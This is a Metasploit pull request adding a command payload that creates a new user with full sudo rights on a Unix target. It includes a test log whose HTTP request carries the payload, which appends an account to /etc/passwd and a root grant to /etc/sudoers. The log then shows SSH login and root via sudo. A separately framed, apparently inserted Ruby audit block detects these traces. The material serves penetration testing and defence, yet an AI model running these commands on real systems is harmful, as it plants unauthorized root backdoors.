Added cmd useradd payload #18002

Merged
merged 18 commits into from Jun 2, 2023
Conversation

rad10
Contributor

@rad10 rad10 commented May 17, 2023

This is a very simple payload (one that I am surprised isn't already implemented because it's so simple yet so useful) that creates a new user on the target system.

Verification

List the steps needed to make sure this thing works

  • Use a desired exploit that uses cmd payloads
  • set payload cmd/unix/useradd
  • set USER <username>
  • set PASS <password>
  • set SUDOERS true
  • exploit
  • Verify that new user exists on target
      • use exploit/linux/local/su_login
      • set SESSION <ID>
      • set PASSWORD <password>
      • run
  • Verify that new user can sudo
      • use post/multi/manage/sudo
      • set SESSION <ID>
      • set PASSWORD <password>
      • run

@bcoles
Contributor

bcoles commented May 19, 2023

An additional optional advanced option to choose user groups would be nice too.

A common sudo configuration is to permit all users in the sudo group to privesc.

The pam_wheel PAM plugin allows only users in the wheel group to privesc.

@rad10
Contributor Author

rad10 commented May 19, 2023

An additional optional advanced option to choose user groups would be nice too.

A common sudo configuration is to permit all users in the sudo group to privesc.

The pam_wheel PAM plugin allows only users in the wheel group to privesc.

Great idea! Got any tips on how? If experience has overcorrected on anything, it's to not trust the executables on the system.

@rad10
Contributor Author

rad10 commented May 19, 2023

Also, I'm getting errors with rubocop, but no corrections being suggested. I feel like it's the description, but I don't know what I should do to fix it since it's just breaking rubocop.

@rad10
Contributor Author

rad10 commented May 26, 2023

So with all of this, are we good to land? Or what else are we missing?

@rad10 rad10 requested review from jvoisin and adfoster-r7 May 29, 2023 16:37
@cdelafuente-r7 cdelafuente-r7 self-assigned this May 31, 2023
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks @rad10 for this payload module! I left a couple of comments for you to review before it lands.

modules/payloads/singles/cmd/unix/adduser.rb (two review comments, outdated, resolved)
rad10 and others added 2 commits May 31, 2023 13:46
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
rad10 and others added 2 commits June 1, 2023 11:32
@cdelafuente-r7
Contributor

Thanks @rad10 for updating this. Everything looks good to me now. I tested with a generic exploit module and verified the user was created with sudo access. I'll go ahead and land it.

  • Example output
msf6 exploit(unix/webapp/generic_exec) > set payload cmd/unix/adduser
payload => cmd/unix/adduser
msf6 exploit(unix/webapp/generic_exec) > options

Module options (exploit/unix/webapp/generic_exec):

   Name     Current Setting        Required  Description
   ----     ---------------        --------  -----------
   CHOST                           no        The local client address
   CMDURI   /test.php?cmd=XXcmdXX  yes       The full URI path with the XXcmdXX parameter
   CPORT                           no        The local client port
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80                     yes       The target port (TCP)
   SSL      false                  no        Negotiate SSL/TLS for outgoing connections
   VHOST                           no        HTTP server virtual host


Payload options (cmd/unix/adduser):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   PASS  Metasploit$1     yes       The password for this user
   USER  metasploit       yes       The username to create


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/generic_exec) > exploit rhosts=127.0.0.1

[*] 127.0.0.1:80 - Sending HTTP request for /test.php?cmd=echo%20%27metasploit%3a%241%24Az%24kf0BaRSqaSF9ewhqk5sMa.%3a1329%3a1329%3a%3a/%3a/bin/sh%27%3e%3e/etc/passwd%3b%5b%20-f%20/etc/sudoers%20%5d%26%26%28echo%20%27metasploit%20ALL%3d%28ALL%3aALL%29%20ALL%27%3e%3e/etc/sudoers%29
[*] 127.0.0.1:80 - The server responded with HTTP CODE 200
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/generic_exec) > ssh -p2222 metasploit@127.0.0.1
[*] exec: ssh -p2222 metasploit@127.0.0.1

metasploit@127.0.0.1's password:
Linux 1afc9e99d278 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1329(metasploit) gid=1329 groups=1329
$ sudo id
[sudo] password for metasploit:
uid=0(root) gid=0(root) groups=0(root)
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
metasploit:$1$Az$kf0BaRSqaSF9ewhqk5sMa.:1329:1329::/:/bin/sh
$ sudo cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "@include" directives:

@includedir /etc/sudoers.d
metasploit ALL=(ALL:ALL) ALL
$ exit
Connection to 127.0.0.1 closed.
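The session above shows the two traces this payload leaves on a host: a user line with an inline hash appended to /etc/passwd, and a user spec appended to /etc/sudoers after the @includedir directive. The following is an added defender-side audit for exactly those traces; it is not part of the module or of the Metasploit code base, and its sample inputs are constructed from the session output rather than read from a real system.

```ruby
# Added example (not Metasploit code): audit the two traces left by a
# passwd/sudoers-appending payload. Sample inputs are constructed from the
# session output in this PR and are not taken from a real host.
PASSWD_SAMPLE = <<~'PASSWD'
  root:x:0:0:root:/root:/bin/bash
  sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
  metasploit:$1$Az$kf0BaRSqaSF9ewhqk5sMa.:1329:1329::/:/bin/sh
PASSWD
SUDOERS_SAMPLE = <<~'SUDOERS'
  Defaults env_reset
  root ALL=(ALL:ALL) ALL
  %sudo ALL=(ALL:ALL) ALL
  @includedir /etc/sudoers.d
  metasploit ALL=(ALL:ALL) ALL
SUDOERS

# Password fields that legitimately carry no hash: shadowed or locked.
NO_INLINE_HASH = %w[x * ! !! *LK*].freeze

# Accounts whose hash sits in /etc/passwd itself, bypassing /etc/shadow.
def unshadowed_accounts(passwd_text)
  passwd_text.each_line.filter_map do |line|
    fields = line.chomp.split(':', -1)
    next unless fields.length == 7           # skip malformed or blank lines
    NO_INLINE_HASH.include?(fields[1]) ? nil : fields[0]
  end
end

# Debian's stock sudoers ends with @includedir, so specs below it were appended.
def specs_after_includedir(sudoers_text)
  after_include = false
  sudoers_text.each_line.filter_map do |raw|
    line = raw.strip
    if line.match?(/\A[@#]include(dir)?\b/)   # '#include' is the legacy form
      after_include = true
      next
    end
    next if line.empty? || line.start_with?('#')
    after_include ? line : nil
  end
end

# Users (other than the allowed principals) granted unrestricted root.
FULL_GRANT = /\A(?<who>\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s+ALL\z/
def full_root_grants(sudoers_text, allowed = %w[root %sudo %wheel])
  sudoers_text.each_line.filter_map do |raw|
    m = FULL_GRANT.match(raw.strip)
    m && !allowed.include?(m[:who]) ? m[:who] : nil
  end
end
```

On a live host, pass File.read('/etc/passwd') and File.read('/etc/sudoers') to the same functions; a non-empty result from any of them is worth a look.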

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 2, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 4661e97 into rapid7:master Jun 2, 2023
31 checks passed
@cdelafuente-r7
Contributor

Release Notes

This adds a command payload module that creates a new privileged user on a *nix target system.

@rad10 rad10 deleted the useradd branch June 2, 2023 17:01
@Op3n4M3 Op3n4M3 mentioned this pull request Jul 17, 2023